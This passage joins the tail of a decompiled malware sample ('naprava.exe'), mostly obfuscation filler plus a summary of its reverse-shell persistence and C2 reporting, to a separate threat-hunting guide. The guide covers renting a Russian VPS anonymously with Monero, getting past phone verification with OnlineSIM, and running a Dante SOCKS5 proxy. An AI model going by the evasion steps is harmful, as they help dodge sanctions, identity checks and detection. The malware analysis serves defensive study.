    local_8 = (LPSYSTEMTIME)(((int)local_8 - extraout_EDX_04) - (uint)(local_b < (byte)pcVar16));
    DAT_0040a0e0 = extraout_EDX_04;
  }
  local_c = 0x2c;
  if ((char)((uint)pcVar16 >> 8) == ',') {
    puts("Qqrlmn. Rfyag, Gur");
  }
  local_8 = (LPSYSTEMTIME)((int)local_8 + 0x33714c);
  local_50 = local_50 - 0xc4faa0;
  _DAT_0040a14c = _DAT_0040a14c & (ushort)local_58;
  DAT_0040a074 = 0;
  strlen("Jnywjsxv Ycr Twdygo");
  QueryPerformanceCounter(&local_70);
  FUN_00407736(s_Peys,_Fk,_Xjffdr_0040a158);
  iVar4 = puts("Yyhlxc, Tqoa Tekwhr");
  if (iVar4 != DAT_0040a0a4) {
    puts("Yupo Rpi Pjvlt, Nxo");
    pcVar16 = DAT_0040a060;
  }
  local_50 = local_50 & 0x1517a4;
  GetTickCount();
  uVar10 = local_24;
  local_58 = local_58 - 0xdd5f30;
  DAT_0040a0fe = 1;
  uVar12 = CONCAT22((short)((uint)p_Var11 >> 0x10),local_24);
  cVar14 = '\x15';
  DAT_0040a0c8 = (LPSYSTEMTIME)pcVar16;
  uVar6 = puts("Etixxpcu Xua, Rcm");
  if ((uVar6 != 0) && ((_DAT_0040a16c & uVar6) != 0)) {
    _DAT_0040a14e = 0xe7f4;
    local_58 = (uint)pcVar17 >> 0x18 | ((uint)pcVar17 & 0xff0000) >> 8 |
               ((uint)pcVar17 & 0xff00) << 8 | (int)pcVar17 << 0x18;
  }
  strlen("Krcjo, Ldtvhs Tcb");
  puts("Jcjia Ewn, Qlhpq");
  if (DAT_0040a170 == extraout_EDX_05) {
    local_54 = pcVar16;
  }
  local_8 = (LPSYSTEMTIME)((int)local_8 + 0x96a3c0);
  bVar8 = 0x60;
  strlen("Xfhdu Nufd, Ajnx");
  p_Var11 = local_8;
  bVar15 = DAT_0040a0c6 < bVar8;
  if (DAT_0040a0c6 == bVar8) {
    bVar15 = 0xfffffe2f < local_58;
    local_58 = local_58 + 0x1d0;
    local_50 = (local_50 - 1) - (uint)bVar15;
    DAT_0040a0e4 = 0xbae0;
    local_24 = (ushort)cVar14;
    bVar15 = local_24 < (ushort)pcVar16;
    if (local_24 == (ushort)pcVar16) {
      bVar15 = false;
    }
  }
  DAT_0040a0ff = DAT_0040a0ff + -0x70 + bVar15;
  uVar6 = FUN_004078aa();
  if (p_Var11 == (LPSYSTEMTIME)uVar6) {
    strlen("Pjprvc Kbc. Pacgex");
  }
  puts("Wetujnfoun Epgj");
  sVar2 = strlen("Ckp, Tvbv Woqkrvgy");
  if (DAT_0040a074 == extraout_EDX_06) {
    local_58 = (local_58 - 0x3a2b10) - (uint)(DAT_0040a074 < extraout_EDX_06);
    local_24 = 1;
    if (sVar2 != 0x9c6cb36d) {
      local_a = -0x50;
    }
  }
  local_54 = (char *)((uint)local_54 | 0x3c8);
  _DAT_0040a0a8 = 0xa91030;
  GetACP();
  DAT_0040a174 = local_78;
  UVar7 = GetOEMCP();
  if ((DAT_0040a0c2 != extraout_CX_00) && ((UVar7 & 0xa3c0b358) == 0)) {
    p_Var11 = (LPSYSTEMTIME)(extraout_EDX_07 >> 8 & 0xff);
  }
  DAT_0040a178 = uVar12;
  iVar4 = puts("Rwvbvtfp. Sdcdt");
  if (iVar4 == 0) {
    local_78 = -local_78;
    _DAT_0040a17c = SUB42(p_Var11,0);
  }
  local_24 = (ushort)local_78;
  GetSystemTime(&local_38);
  FUN_00407736(s_Wxml._Gyak_0040a180);
  bVar8 = (byte)p_Var11;
  uVar9 = CONCAT11(local_a,bVar8);
  pcVar16 = extraout_EDX_08;
  if ((uVar9 != uVar10) &&
     (sVar2 = strlen("Hykkl Cah. Lhk. Kt"), pcVar16 = extraout_EDX_09, sVar2 == 0)) {
    DAT_0040a18c = DAT_0040a18c + -1;
    pcVar16 = local_10;
  }
  uVar12 = ~uVar12;
  local_10 = pcVar16;
  puts("Vdqejy Eeqgd Yleorx");
  local_a = '\x01';
  _DAT_0040a010 = local_78;
  local_8 = (LPSYSTEMTIME)CONCAT22((short)((uint)p_Var11 >> 0x10),uVar9);
  GetOEMCP();
  cVar14 = bVar8 + (char)DAT_0040a074 + (local_c < bVar8);
  QueryPerformanceCounter(&local_70);
  _DAT_0040a17e = 1;
  pcVar16 = "Lwilrw. Smxq, Mtg";
  puts("Lwilrw. Smxq, Mtg");
  bVar15 = DAT_0040a0e0 < local_78;
  if (DAT_0040a0e0 != local_78) {
    DAT_0040a0cc = extraout_EDX_10 & (uint)DAT_0040a060;
    cVar14 = (char)local_54;
    bVar15 = local_10 != (char *)0xffffffff;
    if (!bVar15) {
      DAT_0040a0cc = 0x68f130;
      cVar14 = '\0';
    }
    pcVar16 = (char *)~(uint)pcVar16;
  }
  local_10 = local_10 + (-(uint)bVar15 - (int)pcVar16);
  sVar2 = strlen("Kbwxyj Csqacui. Stp");
  uVar6 = uVar12;
  if (sVar2 == 0) {
    cVar14 = (char)local_58;
    uVar6 = uVar12 - local_58;
  }
  uVar10 = (ushort)uVar6;
  cVar14 = (cVar14 - (char)local_10) - (sVar2 == 0 && uVar12 < local_58);
  local_10 = (char *)0xdaea4;
  puts("Myvilee, Gvixwh A");
  GetTickCount();
  local_3c = 0xffffffff;
  pcVar16 = "Dyfd, Yannldh Toklr";
  strlen("Dyfd, Yannldh Toklr");
  FUN_00408800((uint)pcVar16);
  bVar8 = 0x34;
  iVar4 = puts("Nspexe Yueomh Lh");
  if (local_b == bVar8) {
    cVar14 = (char)iVar4;
  }
  if (SBORROW4(local_50,0x3b4)) {
    puts("Ydtiyt Rj, Jxkg Tmr");
  }
  DAT_0040a05a = DAT_0040a05a & 0x3430;
  GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
  bVar8 = (byte)DAT_0040a190;
  DAT_0040a0c5 = cVar14;
  UVar7 = GetOEMCP();
  if (UVar7 != 0) {
    if ((UVar7 & 0x40) == 0) {
      uVar10 = (ushort)DAT_0040a194;
      local_9 = (undefined)(UVar7 >> 8);
    }
    bVar8 = bVar8 & (byte)local_3c;
  }
  puts("Tfqg Hafugk, Njltyh");
  pcVar16 = "Vbix Iowmwtocmr X";
  puts("Vbix Iowmwtocmr X");
  if (local_24 == uVar10) {
    pcVar16 = (char *)CONCAT22((short)((uint)pcVar16 >> 0x10),
                               CONCAT11(((char)((uint)pcVar16 >> 8) - bVar8) - (local_24 < uVar10),
                                        (char)pcVar16));
  }
  DAT_0040a078 = &DAT_00414570 + (uint)(local_24 != uVar10 && local_24 < uVar10) + (int)DAT_0040a078
  ;
  DAT_0040a0c4 = DAT_0040a0c4 + ' ';
  local_54 = pcVar16;
  GetACP();
  GetSystemTime((LPSYSTEMTIME)&DAT_0040a19c);
  DAT_0040a05a = DAT_0040a05a - 1;
  FUN_00408f23();
                    /* WARNING: Subroutine does not return */
  ExitProcess(0);
}

Conclusion

The malware naprava.exe gathers system information, drops a reverse shell in the WinLogon registry, and then sends info to C2 servers.

You are a threat hunter and need to perform some recon on an adversarial foreign APT. However, you do not want to use a common VPN service to get a foreign IP, since those are easily detected and blocked by foreign ISP router rules.

Solution? Personal Dante SOCKS5 proxy server set up on a VPS with a GeoIP located in your target nation.

Choose a VPS Service

First, you need to find a company that provides a VPS with an IP address geolocated in your target country. In this example, I’m going to choose Russia.

Use the following Google dork: site:”*.by” russia vps

This allows me to find companies in Belarus that offer Russian IP VPS. You can try searching for “*.ru” but with the sanctions, you will be unable to pay for the server with your American CC. But if you also need to stay anonymous, I would recommend using Monero (XMR) cryptocurrency. How do you get some? Coinbase > buy bitcoin > download Cake Wallet > transfer btc from Coinbase to Cake wallet address > Open Cake Wallet app and swap bitcoin for monero. Now you can find a native Russian VPS service that allows rentals with XMR.

However, I’ve noticed that all Russian VPS companies require working Russian contact info — namely, a phone number and/or email address. To do this, use OnlineSIM to get a SMS verification code for an email address sign up with Yandex/RuMail

Install & Configure Dante

I usually install dante on a barebones Debian VPS. Low footprint but still gives me the apt package manager natively.

$ sudo apt update
$ sudo apt install dante-server

Verify dante is installed:

$ systemctl status danted.service

Most likely it’s disabled. Make sure to enable the service.

$ sudo systemctl enable dated.service

Now let’s edit the config file. I usually keep it barebones:

logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The listening network interface or address.
internal: 0.0.0.0 port=1080

# The proxying network interface or address.
external: eth0

# socks-rules determine what is proxied through the external interface.
socksmethod: username

# client-rules determine who can connect to the internal interface.
clientmethod: none

client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}

socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}

If you want to allow only your home computer to connect to the proxy, then specify your IP address in the client pass rule, from: option.

The socksmethod option determines the authentication method for when a client connects to the proxy. username refers to a username/password authentication method. Set clientmethod to none so you don’t have to authenticate again on the internal interface during the proxy connection setup process.

REMEMBER!!! Change the external: option to the interface of your VPS — it could be eth0 or ens3 or enp0s25, etc.

Now restart dante.

$ sudo systemctl restart danted.service

Connect to Proxy

Test the proxy using curl on your personal device.

$ curl -v -x socks5://your_dante_user:your_dante_password@your_server_ip:1080 http://www.google.com/

Output will tell you if you’ve successfully connected to the page.

I use the Dante proxy in Firefox Proxy Containers. Install the Container Proxy plugin and configure a proxy with the auth username/password and make sure it is using the SOCKS5 protocol (SOCKS5 can also be used in proxychains — maybe that’ll be a different post). Now assign that proxy to a container tab.

Open a new tab with that proxy and verify you can reach websites. I would also check the IP address on a public GeoIP checker.